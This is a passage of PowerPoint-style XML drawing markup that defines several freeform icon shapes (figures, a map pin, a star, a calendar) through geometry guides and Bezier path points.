                <a:gd name="T44" fmla="*/ 80 w 200"/>
                <a:gd name="T45" fmla="*/ 128 h 196"/>
                <a:gd name="T46" fmla="*/ 70 w 200"/>
                <a:gd name="T47" fmla="*/ 17 h 196"/>
                <a:gd name="T48" fmla="*/ 31 w 200"/>
                <a:gd name="T49" fmla="*/ 64 h 196"/>
                <a:gd name="T50" fmla="*/ 80 w 200"/>
                <a:gd name="T51" fmla="*/ 113 h 196"/>
                <a:gd name="T52" fmla="*/ 129 w 200"/>
                <a:gd name="T53" fmla="*/ 64 h 196"/>
                <a:gd name="T54" fmla="*/ 70 w 200"/>
                <a:gd name="T55" fmla="*/ 17 h 196"/>
                <a:gd name="T56" fmla="*/ 40 w 200"/>
                <a:gd name="T57" fmla="*/ 132 h 196"/>
                <a:gd name="T58" fmla="*/ 113 w 200"/>
                <a:gd name="T59" fmla="*/ 132 h 196"/>
                <a:gd name="T60" fmla="*/ 108 w 200"/>
                <a:gd name="T61" fmla="*/ 154 h 196"/>
                <a:gd name="T62" fmla="*/ 129 w 200"/>
                <a:gd name="T63" fmla="*/ 196 h 196"/>
                <a:gd name="T64" fmla="*/ 0 w 200"/>
                <a:gd name="T65" fmla="*/ 196 h 196"/>
                <a:gd name="T66" fmla="*/ 20 w 200"/>
                <a:gd name="T67" fmla="*/ 148 h 196"/>
                <a:gd name="T68" fmla="*/ 40 w 200"/>
                <a:gd name="T69" fmla="*/ 132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196">
                  <a:moveTo>
                    <a:pt x="160" y="194"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="194"/>
                    <a:pt x="120" y="176"/>
                    <a:pt x="120" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="132"/>
                    <a:pt x="138" y="114"/>
                    <a:pt x="160" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="114"/>
                    <a:pt x="200" y="132"/>
                    <a:pt x="200" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="176"/>
                    <a:pt x="182" y="194"/>
                    <a:pt x="160" y="194"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="184" y="148"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="148"/>
                    <a:pt x="168" y="148"/>
                    <a:pt x="168" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="132"/>
                    <a:pt x="168" y="132"/>
                    <a:pt x="168" y="132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6" y="164"/>
                    <a:pt x="136" y="164"/>
                    <a:pt x="136" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="164"/>
                    <a:pt x="152" y="164"/>
                    <a:pt x="152" y="164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68" y="180"/>
                    <a:pt x="168" y="180"/>
                    <a:pt x="168" y="180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84" y="164"/>
                    <a:pt x="184" y="164"/>
                    <a:pt x="184" y="164"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="148"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="80" y="128"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="128"/>
                    <a:pt x="16" y="99"/>
                    <a:pt x="16" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="29"/>
                    <a:pt x="45" y="0"/>
                    <a:pt x="80" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="0"/>
                    <a:pt x="144" y="29"/>
                    <a:pt x="144" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="99"/>
                    <a:pt x="116" y="128"/>
                    <a:pt x="80" y="128"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="70" y="17"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="24"/>
                    <a:pt x="74" y="49"/>
                    <a:pt x="31" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="91"/>
                    <a:pt x="53" y="113"/>
                    <a:pt x="80" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="113"/>
                    <a:pt x="129" y="91"/>
                    <a:pt x="129" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="43"/>
                    <a:pt x="62" y="53"/>
                    <a:pt x="70" y="17"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="40" y="132"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="132"/>
                    <a:pt x="113" y="132"/>
                    <a:pt x="113" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="139"/>
                    <a:pt x="108" y="146"/>
                    <a:pt x="108" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="171"/>
                    <a:pt x="117" y="187"/>
                    <a:pt x="12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20" y="148"/>
                    <a:pt x="20" y="148"/>
                    <a:pt x="20" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="148"/>
                    <a:pt x="25" y="132"/>
                    <a:pt x="40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80">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BE2D8BF-8447-49AF-86A5-E4F01E87AF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4001" y="12722"/>
              <a:ext cx="514222" cy="482508"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 151 w 192"/>
                <a:gd name="T1" fmla="*/ 144 h 180"/>
                <a:gd name="T2" fmla="*/ 132 w 192"/>
                <a:gd name="T3" fmla="*/ 128 h 180"/>
                <a:gd name="T4" fmla="*/ 105 w 192"/>
                <a:gd name="T5" fmla="*/ 128 h 180"/>
                <a:gd name="T6" fmla="*/ 108 w 192"/>
                <a:gd name="T7" fmla="*/ 119 h 180"/>
                <a:gd name="T8" fmla="*/ 138 w 192"/>
                <a:gd name="T9" fmla="*/ 104 h 180"/>
                <a:gd name="T10" fmla="*/ 171 w 192"/>
                <a:gd name="T11" fmla="*/ 104 h 180"/>
                <a:gd name="T12" fmla="*/ 182 w 192"/>
                <a:gd name="T13" fmla="*/ 113 h 180"/>
                <a:gd name="T14" fmla="*/ 192 w 192"/>
                <a:gd name="T15" fmla="*/ 144 h 180"/>
                <a:gd name="T16" fmla="*/ 151 w 192"/>
                <a:gd name="T17" fmla="*/ 144 h 180"/>
                <a:gd name="T18" fmla="*/ 146 w 192"/>
                <a:gd name="T19" fmla="*/ 96 h 180"/>
                <a:gd name="T20" fmla="*/ 141 w 192"/>
                <a:gd name="T21" fmla="*/ 95 h 180"/>
                <a:gd name="T22" fmla="*/ 151 w 192"/>
                <a:gd name="T23" fmla="*/ 63 h 180"/>
                <a:gd name="T24" fmla="*/ 129 w 192"/>
                <a:gd name="T25" fmla="*/ 24 h 180"/>
                <a:gd name="T26" fmla="*/ 182 w 192"/>
                <a:gd name="T27" fmla="*/ 59 h 180"/>
                <a:gd name="T28" fmla="*/ 146 w 192"/>
                <a:gd name="T29" fmla="*/ 96 h 180"/>
                <a:gd name="T30" fmla="*/ 140 w 192"/>
                <a:gd name="T31" fmla="*/ 66 h 180"/>
                <a:gd name="T32" fmla="*/ 94 w 192"/>
                <a:gd name="T33" fmla="*/ 112 h 180"/>
                <a:gd name="T34" fmla="*/ 48 w 192"/>
                <a:gd name="T35" fmla="*/ 66 h 180"/>
                <a:gd name="T36" fmla="*/ 94 w 192"/>
                <a:gd name="T37" fmla="*/ 20 h 180"/>
                <a:gd name="T38" fmla="*/ 140 w 192"/>
                <a:gd name="T39" fmla="*/ 66 h 180"/>
                <a:gd name="T40" fmla="*/ 86 w 192"/>
                <a:gd name="T41" fmla="*/ 33 h 180"/>
                <a:gd name="T42" fmla="*/ 58 w 192"/>
                <a:gd name="T43" fmla="*/ 66 h 180"/>
                <a:gd name="T44" fmla="*/ 94 w 192"/>
                <a:gd name="T45" fmla="*/ 102 h 180"/>
                <a:gd name="T46" fmla="*/ 129 w 192"/>
                <a:gd name="T47" fmla="*/ 66 h 180"/>
                <a:gd name="T48" fmla="*/ 86 w 192"/>
                <a:gd name="T49" fmla="*/ 33 h 180"/>
                <a:gd name="T50" fmla="*/ 60 w 192"/>
                <a:gd name="T51" fmla="*/ 23 h 180"/>
                <a:gd name="T52" fmla="*/ 36 w 192"/>
                <a:gd name="T53" fmla="*/ 63 h 180"/>
                <a:gd name="T54" fmla="*/ 46 w 192"/>
                <a:gd name="T55" fmla="*/ 100 h 180"/>
                <a:gd name="T56" fmla="*/ 46 w 192"/>
                <a:gd name="T57" fmla="*/ 100 h 180"/>
                <a:gd name="T58" fmla="*/ 9 w 192"/>
                <a:gd name="T59" fmla="*/ 59 h 180"/>
                <a:gd name="T60" fmla="*/ 60 w 192"/>
                <a:gd name="T61" fmla="*/ 23 h 180"/>
                <a:gd name="T62" fmla="*/ 23 w 192"/>
                <a:gd name="T63" fmla="*/ 104 h 180"/>
                <a:gd name="T64" fmla="*/ 50 w 192"/>
                <a:gd name="T65" fmla="*/ 104 h 180"/>
                <a:gd name="T66" fmla="*/ 80 w 192"/>
                <a:gd name="T67" fmla="*/ 120 h 180"/>
                <a:gd name="T68" fmla="*/ 82 w 192"/>
                <a:gd name="T69" fmla="*/ 128 h 180"/>
                <a:gd name="T70" fmla="*/ 58 w 192"/>
                <a:gd name="T71" fmla="*/ 128 h 180"/>
                <a:gd name="T72" fmla="*/ 40 w 192"/>
                <a:gd name="T73" fmla="*/ 144 h 180"/>
                <a:gd name="T74" fmla="*/ 0 w 192"/>
                <a:gd name="T75" fmla="*/ 144 h 180"/>
                <a:gd name="T76" fmla="*/ 11 w 192"/>
                <a:gd name="T77" fmla="*/ 113 h 180"/>
                <a:gd name="T78" fmla="*/ 23 w 192"/>
                <a:gd name="T79" fmla="*/ 104 h 180"/>
                <a:gd name="T80" fmla="*/ 65 w 192"/>
                <a:gd name="T81" fmla="*/ 132 h 180"/>
                <a:gd name="T82" fmla="*/ 125 w 192"/>
                <a:gd name="T83" fmla="*/ 132 h 180"/>
                <a:gd name="T84" fmla="*/ 140 w 192"/>
                <a:gd name="T85" fmla="*/ 143 h 180"/>
                <a:gd name="T86" fmla="*/ 152 w 192"/>
                <a:gd name="T87" fmla="*/ 180 h 180"/>
                <a:gd name="T88" fmla="*/ 36 w 192"/>
                <a:gd name="T89" fmla="*/ 180 h 180"/>
                <a:gd name="T90" fmla="*/ 51 w 192"/>
                <a:gd name="T91" fmla="*/ 143 h 180"/>
                <a:gd name="T92" fmla="*/ 65 w 192"/>
                <a:gd name="T93" fmla="*/ 13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80">
                  <a:moveTo>
                    <a:pt x="151" y="144"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="142"/>
                    <a:pt x="145" y="128"/>
                    <a:pt x="132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20" y="116"/>
                    <a:pt x="130" y="113"/>
                    <a:pt x="138" y="104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80" y="104"/>
                    <a:pt x="182" y="113"/>
                    <a:pt x="182" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="144"/>
                    <a:pt x="192" y="144"/>
                    <a:pt x="192" y="144"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="144"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="146" y="96"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="96"/>
                    <a:pt x="143" y="95"/>
                    <a:pt x="141" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="86"/>
                    <a:pt x="151" y="75"/>
                    <a:pt x="151" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="38"/>
                    <a:pt x="139" y="34"/>
                    <a:pt x="129" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="32"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="182" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="79"/>
                    <a:pt x="166" y="96"/>
                    <a:pt x="146" y="96"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="140" y="66"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="92"/>
                    <a:pt x="119" y="112"/>
                    <a:pt x="94" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="112"/>
                    <a:pt x="48" y="92"/>
                    <a:pt x="48" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="41"/>
                    <a:pt x="68" y="20"/>
                    <a:pt x="94" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="20"/>
                    <a:pt x="140" y="41"/>
                    <a:pt x="140" y="66"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="86" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="38"/>
                    <a:pt x="89" y="56"/>
                    <a:pt x="58" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="86"/>
                    <a:pt x="74" y="102"/>
                    <a:pt x="94" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="102"/>
                    <a:pt x="129" y="86"/>
                    <a:pt x="129" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="52"/>
                    <a:pt x="81" y="58"/>
                    <a:pt x="86" y="33"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="60" y="23"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="33"/>
                    <a:pt x="36" y="41"/>
                    <a:pt x="36" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="75"/>
                    <a:pt x="40" y="90"/>
                    <a:pt x="46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26" y="100"/>
                    <a:pt x="9" y="79"/>
                    <a:pt x="9" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="3"/>
                    <a:pt x="90" y="29"/>
                    <a:pt x="60" y="23"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="23" y="104"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="104"/>
                    <a:pt x="50" y="104"/>
                    <a:pt x="50" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="115"/>
                    <a:pt x="66" y="118"/>
                    <a:pt x="80" y="120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58" y="128"/>
                    <a:pt x="58" y="128"/>
                    <a:pt x="58" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="128"/>
                    <a:pt x="41" y="142"/>
                    <a:pt x="40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13"/>
                    <a:pt x="14" y="104"/>
                    <a:pt x="23" y="104"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="65" y="132"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="132"/>
                    <a:pt x="125" y="132"/>
                    <a:pt x="125" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="132"/>
                    <a:pt x="140" y="143"/>
                    <a:pt x="140" y="143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3"/>
                    <a:pt x="54" y="132"/>
                    <a:pt x="65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83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DE417AE-DCDD-4D82-A290-66EC9CA8FE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200000">
              <a:off x="953803" y="4764419"/>
              <a:ext cx="579438" cy="741363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3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3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0" y="153"/>
                    <a:pt x="78" y="197"/>
                    <a:pt x="78" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="197"/>
                    <a:pt x="15" y="160"/>
                    <a:pt x="3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80"/>
                    <a:pt x="153" y="83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3" y="47"/>
                    <a:pt x="33" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="95"/>
                    <a:pt x="53" y="114"/>
                    <a:pt x="77" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="114"/>
                    <a:pt x="120" y="95"/>
                    <a:pt x="120" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="47"/>
                    <a:pt x="100" y="28"/>
                    <a:pt x="77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8" name="Freeform 84">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BF5417C-B9A2-4209-B1BD-CFB677E33B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9109649">
              <a:off x="7311862" y="3305164"/>
              <a:ext cx="579438" cy="741363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 153 w 154"/>
                <a:gd name="T1" fmla="*/ 85 h 197"/>
                <a:gd name="T2" fmla="*/ 78 w 154"/>
                <a:gd name="T3" fmla="*/ 197 h 197"/>
                <a:gd name="T4" fmla="*/ 4 w 154"/>
                <a:gd name="T5" fmla="*/ 101 h 197"/>
                <a:gd name="T6" fmla="*/ 0 w 154"/>
                <a:gd name="T7" fmla="*/ 77 h 197"/>
                <a:gd name="T8" fmla="*/ 77 w 154"/>
                <a:gd name="T9" fmla="*/ 0 h 197"/>
                <a:gd name="T10" fmla="*/ 154 w 154"/>
                <a:gd name="T11" fmla="*/ 77 h 197"/>
                <a:gd name="T12" fmla="*/ 153 w 154"/>
                <a:gd name="T13" fmla="*/ 85 h 197"/>
                <a:gd name="T14" fmla="*/ 77 w 154"/>
                <a:gd name="T15" fmla="*/ 28 h 197"/>
                <a:gd name="T16" fmla="*/ 34 w 154"/>
                <a:gd name="T17" fmla="*/ 71 h 197"/>
                <a:gd name="T18" fmla="*/ 77 w 154"/>
                <a:gd name="T19" fmla="*/ 114 h 197"/>
                <a:gd name="T20" fmla="*/ 120 w 154"/>
                <a:gd name="T21" fmla="*/ 71 h 197"/>
                <a:gd name="T22" fmla="*/ 77 w 154"/>
                <a:gd name="T23" fmla="*/ 28 h 197"/>
                <a:gd name="T24" fmla="*/ 97 w 154"/>
                <a:gd name="T25" fmla="*/ 99 h 197"/>
                <a:gd name="T26" fmla="*/ 77 w 154"/>
                <a:gd name="T27" fmla="*/ 89 h 197"/>
                <a:gd name="T28" fmla="*/ 58 w 154"/>
                <a:gd name="T29" fmla="*/ 99 h 197"/>
                <a:gd name="T30" fmla="*/ 60 w 154"/>
                <a:gd name="T31" fmla="*/ 77 h 197"/>
                <a:gd name="T32" fmla="*/ 46 w 154"/>
                <a:gd name="T33" fmla="*/ 61 h 197"/>
                <a:gd name="T34" fmla="*/ 67 w 154"/>
                <a:gd name="T35" fmla="*/ 57 h 197"/>
                <a:gd name="T36" fmla="*/ 77 w 154"/>
                <a:gd name="T37" fmla="*/ 38 h 197"/>
                <a:gd name="T38" fmla="*/ 88 w 154"/>
                <a:gd name="T39" fmla="*/ 57 h 197"/>
                <a:gd name="T40" fmla="*/ 109 w 154"/>
                <a:gd name="T41" fmla="*/ 61 h 197"/>
                <a:gd name="T42" fmla="*/ 94 w 154"/>
                <a:gd name="T43" fmla="*/ 77 h 197"/>
                <a:gd name="T44" fmla="*/ 97 w 154"/>
                <a:gd name="T45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4" h="197">
                  <a:moveTo>
                    <a:pt x="153" y="85"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="153"/>
                    <a:pt x="78" y="197"/>
                    <a:pt x="78" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="197"/>
                    <a:pt x="16" y="159"/>
                    <a:pt x="4" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="93"/>
                    <a:pt x="0" y="85"/>
                    <a:pt x="0" y="77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4" y="34"/>
                    <a:pt x="154" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="79"/>
                    <a:pt x="154" y="82"/>
                    <a:pt x="153" y="85"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="28"/>
                    <a:pt x="34" y="47"/>
                    <a:pt x="34" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="94"/>
                    <a:pt x="53" y="114"/>
                    <a:pt x="77" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="114"/>
                    <a:pt x="120" y="94"/>
                    <a:pt x="120" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="47"/>
                    <a:pt x="101" y="28"/>
                    <a:pt x="77" y="28"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="97" y="99"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="89"/>
                    <a:pt x="77" y="89"/>
                    <a:pt x="77" y="8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60" y="77"/>
                    <a:pt x="60" y="77"/>
                    <a:pt x="60" y="7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94" y="77"/>
                    <a:pt x="94" y="77"/>
                    <a:pt x="94" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="9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85">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64AF18A5-B640-4261-9636-0A8854D0AA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99709" y="2965550"/>
              <a:ext cx="723900" cy="688975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 227 w 456"/>
                <a:gd name="T1" fmla="*/ 0 h 434"/>
                <a:gd name="T2" fmla="*/ 302 w 456"/>
                <a:gd name="T3" fmla="*/ 135 h 434"/>
                <a:gd name="T4" fmla="*/ 456 w 456"/>
                <a:gd name="T5" fmla="*/ 166 h 434"/>
                <a:gd name="T6" fmla="*/ 350 w 456"/>
                <a:gd name="T7" fmla="*/ 280 h 434"/>
                <a:gd name="T8" fmla="*/ 369 w 456"/>
                <a:gd name="T9" fmla="*/ 434 h 434"/>
                <a:gd name="T10" fmla="*/ 227 w 456"/>
                <a:gd name="T11" fmla="*/ 367 h 434"/>
                <a:gd name="T12" fmla="*/ 87 w 456"/>
                <a:gd name="T13" fmla="*/ 434 h 434"/>
                <a:gd name="T14" fmla="*/ 106 w 456"/>
                <a:gd name="T15" fmla="*/ 280 h 434"/>
                <a:gd name="T16" fmla="*/ 0 w 456"/>
                <a:gd name="T17" fmla="*/ 166 h 434"/>
                <a:gd name="T18" fmla="*/ 153 w 456"/>
                <a:gd name="T19" fmla="*/ 135 h 434"/>
                <a:gd name="T20" fmla="*/ 227 w 456"/>
                <a:gd name="T21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6" h="434">
                  <a:moveTo>
                    <a:pt x="227" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="302" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369" y="434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87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3" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2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88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C47631-12DB-4CD2-9C59-A42B062B71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080229">
              <a:off x="10645043" y="34042"/>
              <a:ext cx="720725" cy="688975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1" name="Freeform 89">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F00FB99E-E7E5-45E3-B3BF-7AF0B4E389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334403">
              <a:off x="3179228" y="3951711"/>
              <a:ext cx="725488" cy="555625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 167 w 193"/>
                <a:gd name="T1" fmla="*/ 14 h 148"/>
                <a:gd name="T2" fmla="*/ 159 w 193"/>
                <a:gd name="T3" fmla="*/ 0 h 148"/>
                <a:gd name="T4" fmla="*/ 139 w 193"/>
                <a:gd name="T5" fmla="*/ 6 h 148"/>
                <a:gd name="T6" fmla="*/ 125 w 193"/>
                <a:gd name="T7" fmla="*/ 20 h 148"/>
                <a:gd name="T8" fmla="*/ 55 w 193"/>
                <a:gd name="T9" fmla="*/ 14 h 148"/>
                <a:gd name="T10" fmla="*/ 47 w 193"/>
                <a:gd name="T11" fmla="*/ 0 h 148"/>
                <a:gd name="T12" fmla="*/ 26 w 193"/>
                <a:gd name="T13" fmla="*/ 6 h 148"/>
                <a:gd name="T14" fmla="*/ 15 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 148"/>
                <a:gd name="T16" fmla="*/ 0 w 193"/>
                <a:gd name="T17" fmla="*/ 134 h 148"/>
                <a:gd name="T18" fmla="*/ 178 w 193"/>
                <a:gd name="T19" fmla="*/ 148 h 148"/>
                <a:gd name="T20" fmla="*/ 193 w 193"/>
                <a:gd name="T21" fmla="*/ 34 h 148"/>
                <a:gd name="T22" fmla="*/ 146 w 193"/>
                <a:gd name="T23" fmla="*/ 14 h 148"/>
                <a:gd name="T24" fmla="*/ 153 w 193"/>
                <a:gd name="T25" fmla="*/ 7 h 148"/>
                <a:gd name="T26" fmla="*/ 160 w 193"/>
                <a:gd name="T27" fmla="*/ 28 h 148"/>
                <a:gd name="T28" fmla="*/ 153 w 193"/>
                <a:gd name="T29" fmla="*/ 35 h 148"/>
                <a:gd name="T30" fmla="*/ 146 w 193"/>
                <a:gd name="T31" fmla="*/ 14 h 148"/>
                <a:gd name="T32" fmla="*/ 107 w 193"/>
                <a:gd name="T33" fmla="*/ 92 h 148"/>
                <a:gd name="T34" fmla="*/ 107 w 193"/>
                <a:gd name="T35" fmla="*/ 84 h 148"/>
                <a:gd name="T36" fmla="*/ 146 w 193"/>
                <a:gd name="T37" fmla="*/ 88 h 148"/>
                <a:gd name="T38" fmla="*/ 146 w 193"/>
                <a:gd name="T39" fmla="*/ 104 h 148"/>
                <a:gd name="T40" fmla="*/ 108 w 193"/>
                <a:gd name="T41" fmla="*/ 108 h 148"/>
                <a:gd name="T42" fmla="*/ 108 w 193"/>
                <a:gd name="T43" fmla="*/ 100 h 148"/>
                <a:gd name="T44" fmla="*/ 146 w 193"/>
                <a:gd name="T45" fmla="*/ 104 h 148"/>
                <a:gd name="T46" fmla="*/ 68 w 193"/>
                <a:gd name="T47" fmla="*/ 80 h 148"/>
                <a:gd name="T48" fmla="*/ 40 w 193"/>
                <a:gd name="T49" fmla="*/ 80 h 148"/>
                <a:gd name="T50" fmla="*/ 34 w 193"/>
                <a:gd name="T51" fmla="*/ 14 h 148"/>
                <a:gd name="T52" fmla="*/ 41 w 193"/>
                <a:gd name="T53" fmla="*/ 7 h 148"/>
                <a:gd name="T54" fmla="*/ 47 w 193"/>
                <a:gd name="T55" fmla="*/ 28 h 148"/>
                <a:gd name="T56" fmla="*/ 40 w 193"/>
                <a:gd name="T57" fmla="*/ 35 h 148"/>
                <a:gd name="T58" fmla="*/ 34 w 193"/>
                <a:gd name="T59" fmla="*/ 14 h 148"/>
                <a:gd name="T60" fmla="*/ 31 w 193"/>
                <a:gd name="T61" fmla="*/ 123 h 148"/>
                <a:gd name="T62" fmla="*/ 28 w 193"/>
                <a:gd name="T63" fmla="*/ 113 h 148"/>
                <a:gd name="T64" fmla="*/ 44 w 193"/>
                <a:gd name="T65" fmla="*/ 103 h 148"/>
                <a:gd name="T66" fmla="*/ 56 w 193"/>
                <a:gd name="T67" fmla="*/ 107 h 148"/>
                <a:gd name="T68" fmla="*/ 74 w 193"/>
                <a:gd name="T69" fmla="*/ 103 h 148"/>
                <a:gd name="T70" fmla="*/ 83 w 193"/>
                <a:gd name="T71" fmla="*/ 117 h 148"/>
                <a:gd name="T72" fmla="*/ 143 w 193"/>
                <a:gd name="T73" fmla="*/ 124 h 148"/>
                <a:gd name="T74" fmla="*/ 103 w 193"/>
                <a:gd name="T75" fmla="*/ 119 h 148"/>
                <a:gd name="T76" fmla="*/ 143 w 193"/>
                <a:gd name="T77" fmla="*/ 116 h 148"/>
                <a:gd name="T78" fmla="*/ 143 w 193"/>
                <a:gd name="T79" fmla="*/ 124 h 148"/>
                <a:gd name="T80" fmla="*/ 111 w 193"/>
                <a:gd name="T81" fmla="*/ 76 h 148"/>
                <a:gd name="T82" fmla="*/ 111 w 193"/>
                <a:gd name="T83" fmla="*/ 63 h 148"/>
                <a:gd name="T84" fmla="*/ 167 w 193"/>
                <a:gd name="T85" fmla="*/ 6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3" h="148">
                  <a:moveTo>
